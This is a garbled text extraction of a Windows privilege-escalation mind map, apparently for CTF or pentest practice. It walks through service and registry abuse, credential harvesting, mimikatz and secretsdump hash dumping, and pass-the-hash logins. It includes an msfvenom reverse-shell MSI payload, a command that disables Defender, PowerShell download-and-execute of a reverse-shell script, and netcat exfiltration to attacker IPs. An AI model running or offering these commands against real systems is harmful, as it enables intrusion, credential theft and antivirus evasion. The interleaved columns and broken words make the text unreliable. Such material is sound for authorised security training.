‎Windows PE
‎Mind Map
‎LOCAL PORTS
‎VULNERABLE APPS
‎CVE & KERNEL EXPLOIT
‎NO
‎ un the attached command
R ‎ pload procmon and look for
‎commad to get all the installed
‎apps with their version
‎numbers and search for
‎vulnerabilities for their
‎version. Did you find what you'
‎re looking for?
‎NO ‎YES
‎ un `systeminfo > systeminfo.
R ‎What a lovely day, isn't it
‎txt` transfer the output to the
‎attacker machine and pipe it 
‎to WES-NG. It gotta be kernel
‎exploit.
‎NO
‎ e've covered most common
W ‎you
‎ways to escalete our privileges
‎in Windows ,now we can use
‎WinPeas we didn't miss
‎anything
‎TOKEN ABUSING
‎`whoami /priv` (Do we have
‎any of these following 
‎permissions?)
‎NO ‎YES
‎Insecure Service ‎Is there any service that have ‎ earch the privilege you've
S
‎Permissions ‎permission to change ‎found in the internet ,follow
‎configs?: `accesschk.exe - ‎the instructions.

‎Unquoted Services ‎uwcqv "$username" *` (we are
‎SERVICE EXPLOITING ‎looking for "SERVICE_
‎Weak Registry Permissions ‎CHANGE_CONFIG" privilege)
‎Insecure Service ‎NO ‎YES
‎Executables
I‎ s there any unquoted ‎`sc config $service_name= "\"
‎services?`wmic service get ‎C:\Path\to\revshell.exe\""`
‎name,pathname,displayname,

‎startmode | findstr /i auto |
‎findstr /i /v "C:\Windows\\" | ‎`net start $service_name`
‎findstr /i /v """`
‎NO ‎YES
‎Use accesschk ,Is there any ‎`copy C:\Path\to\revshell.exe "
‎service that has "NT ‎C:\Path\to\service\directory\$

‎AUTHORITY\INTERACTIVE" ‎service_name.exe"`
‎privilege? : `
‎net start $service_name
‎NO ‎YES
‎Using accesschk.exe, is there r‎ eg add `HKLM\SYSTEM\
‎any service that (BINARY_ ‎CurrentControlSet\services\
‎PATH_NAME) file is writable ‎regsvc /v ImagePath /t REG_
‎by everyone: ‎EXPAND_SZ /d C:\Path\to\
‎ ‎revshell.exe /f`
‎accesschk.exe /accepteula -
‎quvw "C:\Path\to\
‎insecureservice.exe" ‎net start $service_name
‎Auto Runs ‎NO ‎YES
‎REGISTRY EXPLOITATION
‎AlwaysInstallElevated
‎Run following command ,is ‎ copy C:\Path\to\revshell.exe "
`
‎there any non default .exe ‎C:\Path\to\vulnerable\service\
‎file? : `reg query HKLM\  ‎directory\$service_name" /Y`
‎SOFTWARE\Microsoft\
‎Windows\CurrentVersion\Run`
‎NO ‎YES
‎ heck if the "Always Install
C ‎`copy C:\Path\to\revshell.exe "
‎Elevated" vulnerability exist : ` ‎C:\Program Files\Autorun
‎reg query HKCU\SOFTWARE\ ‎Program\program.exe" /Y`
‎Policies\Microsoft\Windows\
‎Installer /v

‎AlwaysInstallElevated
‎reg query HKLM\SOFTWARE\
‎Policies\Microsoft\Windows\
‎Installer /v
‎SCHEDULED TASKS ‎AlwaysInstallElevated`
‎Do you see that both keys are
‎equal to 0x1?
‎NO ‎YES
‎ his mind map covers these
T
‎techniques :
‎Do we have any non default ‎Create a .msi backdoor and
‎1 + Misconfigured Privileges
‎scheduled task? : `Get- ‎transfer it to the target : `
‎- Token Abusing
‎ScheduledTask | where {$_. ‎msfvenom -p windows/x64/
 ‎2 + Services
‎TaskPath -notlike "\ ‎shell_reverse_tcp LHOST=10.
‎Microsoft*"} | ft TaskName, ‎10.10.10 LPORT=9001 -f msi -o ‎- Service Exploits - Insecure Service Permissions
‎TaskPath,State` ‎reverse.msi` ‎- Service Exploits - Unquoted Service Path
‎- Service Exploits - Weak Registry Permissions
‎Unattend.xml ‎- Service Exploits - Insecure Service Executables
‎NO ‎YES ‎`msiexec /quiet /qn /i C:\Path\
‎3 + Registry
‎to\revshell.msi`
‎Powershell history ‎- Registry - AutoRuns
‎ REDENTIAL
C
‎ heck following locations ,are they exist and
C ‎Use accesschk do we have ‎- Registry - AlwaysInstallElevated
‎HARVESTING ‎Saved Credentials ‎did you find creds in them? : ‎write permission on that ‎4 + Schedules Tasks
‎ C:\Unattend.xml ‎file? : `accesschk.exe / ‎5 + Creds in files / Harvesting Passwords from Usual Spots
‎IIS Configuration ‎ C:\Windows\Panther\Unattend.xml ‎accepteula -quvw user C:\Path\
‎- Unattend.xml
‎ C:\Windows\Panther\Unattend\Unattend.xml ‎To\Scheduled\task.ps1`
‎- Powershell History
‎ C:\Windows\system32\sysprep.inf
‎ C:\Windows\system32\sysprep\sysprep.xml ‎- Saved Windows Credentials
‎NO ‎YES ‎- IIS Configuration
‎6 + Password Dumping
‎Check powershell history : ` ‎- mimikatz
‎type C:\Users\$User_name\ ‎ echo C:\Path\To\revshell.
`
‎exe >> C:\Path\To\Scheduled\ ‎- secretsdump with SAM & SYSTEM
‎AppData\Roaming\Microsoft\
‎task.ps1` ‎7 + Local ports
‎Windows\PowerShell\
‎PSReadline\ConsoleHost_ ‎8 + Other Methods
‎history.txt` ‎- Dll Hijacking
‎- Interestig Groups /DnsAdmins
‎- Insecure Gui Apps
‎ heck if we have any saved
C
‎9 + Vulnerable software
‎credentials : `cmdkey /list`
‎10 + CVE & KERNEL EXPLOIT
‎
‎- WES-NG
‎Check if we have an credentials in IIS
‎ configuration page :
‎Mimikatz
‎`C:\inetpub\wwwroot\web.config
‎HASH DUMPING
‎C:\Windows\Microsoft.NET\Framework64\
‎Sam & System
‎v4.0.30319\Config\web.config`
‎Did you find anything?
‎NO ‎YES
‎Upload mimikatz Dump the ‎ reat authenticate yourself
G
‎hashes : `./mimikatz.exe " ‎with the brand new creds you' ‎ ile Transfer Tips
F
‎privilege::debug" "lsadump:: ‎ve obtained. ‎Python
‎lsa /patch" "exit"` Are you  ‎
‎authenticated for this proccess ‎python3 -m http.server 80
‎or and/or did you find ‎SMB
‎anything? ‎
‎Run the server on Kali:
‎NO ‎YES ‎
‎sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py kali .
‎
‎ heck If you have
C ‎Use evil-winrm if target's ‎ se tools that allows PTH
U ‎OR
‎SeBackupPrivilege or ‎wimrm port is open ‎attack ,If you find yourself in ‎
‎authorized to read these ‎trouble crack the hash with ‎python3.9 /opt/impacket/examples/smbserver.py -smb2support -username THMBackup -password
‎files  ‎hashcat (-m 1000) ‎ ome Quick Tips&Tricks
S ‎CopyMaster555 public share
‎C:\Windows\repair\SAM ‎ ‎On Windows, check that the share can be seen:
‎C:\Windows\repair\ ‎- If you're having issues with AV(you can check it with this command `Get-Service WinDefend`)and you ‎net view \\10.0.0.1
‎SYSTEM ‎have priviliges to turn it off, here is the command that does that : ‎
‎`Set-MpPreference -DisableRealtimeMonitoring $true` ‎Regular filesystem commands should all work, and files can be copied to and from the share:
‎ ‎
‎NO ‎YES ‎Download From Windows : copy \\10.0.0.1\kali\file.exe C:\Windows\Temp\file.exe
‎- If you see "Remote Management Users" in results of whoami /all ,you are able to use GUI logins against
‎target ‎Download From Kali : copy C:\Windows\Temp\file.exe \\10.0.0.1\kali\file.exe
‎ ‎
‎Do we have an port local port ‎ ransfer the files to attacker
T ‎Transfer the files to attacker ‎This doesn't require file
‎- psexec stands for powershell execution ,alternatively you can use wmiexec as well as smbexec but the ‎Netcat
‎that isn't listed by nmap ? : `  ‎machine, use creddump7 : ` ‎machine use impacket's ‎transfer (assuming we
‎best way is if winrm port is open use evil-winrm ‎
‎netstat -ano` ‎python3 creddump7/pwdump. ‎secretsdump : `secretsdump. ‎uploaded mimikatz already)
‎ ‎(on the receiver side) nc -l -p 1234 > [file_name]
‎py SYSTEM SAM` ‎py -sam SAM -system SYSTEM ‎Launch mimikatz and give this
‎- `C:\Inetpub\wwwroot` is the webserver of windows similiar to /var/www in linux systems. ‎(on the sender side) nc -w 3 10.2.111.159 1234 < [file_name]
‎LOCAL` ‎command : `lsadump::sam /
‎NO ‎YES ‎ ‎Note : If it doesn't work you can try this on sender side :
‎system:SYSTEM /SAM:SAM`
‎- The best directory to work on it : C:\Windows\System32\spool\drivers\color ,every windows machine ‎
‎has this directory ,it is world writeable and you'll not have issues with AV ‎cat [file_name] | nc 10.11.34.130 321
‎ heck if we're a part of
C ‎Use chisel to find out what's ‎ ‎On Windows run:
‎interesting group such as  ‎going on over there ‎- If you dealing with a windows version 2008 or older ,you can get credentials in groups.xml ,it's gpp ‎
‎DnsAdmins ‎decrypted ,you can download gpp like this apt-get install gpp-decrypt ,and decode the hash like gpp- ‎nc.exe -nv 10.0.0.1 4444 < file.exe
‎decrypt <hash> ‎Powershell
‎ ‎
‎NO ‎YES
‎Interesting Groups ‎- You can get credentials from .ntds files like this : impacket-secretsdump -ntds ntds.dit -system SYSTEM ‎Transferring from Kali to Windows
‎LOCAL ‎Go to terminal open a listener with :
‎Do you have GUI access? ‎Check Hacktricks or Google the ‎Dll Hijacking ‎OTHER METHODS ‎ ‎
‎group ,follow the instructions. ‎- Get-Service | Where-Object -Property Status -EQ Run it to get all running services ‎python3 -m http.server 80
‎OR ‎Download it from Windows(As x64 bits) :
‎YES
‎Insecure Gui Apps
‎ ‎C:\\Windows\\SysNative\\WindowsPowershell\\v1.0\\powershell.exe IEX (New-Object Net.Webclient).
‎- Get-WmiObject win32_service | Select-Object Name, State, PathName | Where-Object {$_.State -like ' ‎downloadString('http://10.10.10.10/Invoke-PowershellTcp.ps1')
‎Running'} ‎OR
U
‎OR: ‎CertUtil
‎not found dlls and follow the
‎ ‎
‎instruction of the link that is 
‎- tasklist /svc ‎certutil.exe is available on more modern versions of Windows.
 ‎attached. Did you find what
‎OR simply: ‎
‎you're looking for?
‎ ‎certutil.exe -urlcache -split -f http://10.0.0.1:4444/file.exe C:\Windows\Temp\file.exe
‎- services Or service
‎NO ‎YES ‎
‎- netsh advfirewall show currentprofile to showing the status of firewall
‎
‎ heck if there is any
C ‎Great enjoy your new ‎- icalcs <PATH> to question your privileges on a certain file or directory
‎application that is running by ‎privileges ‎
‎Admin such as paint ‎- If redis port is open ,then it's there for a reason ,check it out #6479-Redis
‎
‎- You can unzip files in windows through : Expand-Archive -Force $path_to_zip $path_to_save
‎NO ‎YES
‎
‎- If you have a ntlm hash but not a password ,you can evaluate it like this
‎In short try to open another ‎
‎file in misconfigured ‎Connect to RDP using PtH:
‎application ,enter full path of  ‎ ‎ eferences :
R
‎cmd.exe. This article will help ‎xfreerdp /v:VICTIM_IP /u:DOMAIN\\MyUser /pth:NTLM_HASH ‎• https://sirensecurity.io/blog/windows-privilege-escalation-resources/
‎Connect via psexec using PtH: ‎• https://book.hacktricks.xyz/windows-hardening/checklist-windows-privilege-escalation
‎ ‎• https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/
‎psexec.py -hashes NTLM_HASH DOMAIN/MyUser@VICTIM_IP ‎Windows%20-%20Privilege%20Escalation.md
‎Note: Only the linux version of psexec support PtH. ‎• https://github.com/Guiomuh/LPE_checklist
‎ ‎• https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/
‎Connect to WinRM using PtH: ‎Windows%20-%20Mimikatz.md
‎ ‎• https://medium.com/@s12deff/winpeas-windows-privilege-escalation-f5f5b1737829
‎evil-winrm -i VICTIM_IP -u MyUser -H NTLM_HASH